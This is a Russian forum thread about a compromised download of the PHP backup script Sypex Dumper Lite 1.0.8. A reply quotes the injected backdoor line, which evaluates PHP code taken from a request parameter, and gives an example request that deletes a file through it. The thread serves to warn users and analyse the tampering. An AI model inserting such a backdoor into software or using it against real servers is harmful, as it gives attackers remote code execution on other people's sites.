Взломали Sypex Dumper Lite 1.0.8

Moony
На сайте с 02.07.2005
Offline
64
715

Несколько дней назад заметил странный Notice при запуске программы для бэкапа базы на сервере Sypex Dumper Lite 1.0.8. Связался с автором, сегодня получил ответ, что хостинг сломали и файл подпортили. На вопрос, есть ли угроза безопасности для уже закачанной с помощью поломанного скрипта базы, получил ответ, что нет, опасности нет. В общем, выкладываю поломанный скрипт и новый, который с сегодняшнего дня лежит на сайте. Судя по дате создания поломанного скрипта, он был подменен 11 августа 2009 года. Хотелось бы узнать мнение спецов насчет опастности поломанного скрипта, ну и предупредить тех, кто эти два месяца пользовался им.

Файлы в приложении, расширение php заменил на txt (dumper_crack.txt и dumper_ok.txt).

J
На сайте с 02.02.2009
Offline
53
#1

$new = create_function('$x', "return $_REQUEST[sess];");

$new(0);

фактически единственное чего надо опасаться

то есть запрос вида dumper.php.php?sess=unlink%28rmthis%29 удалит файл rmthis

сухозин вродь режет такие шляпы.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий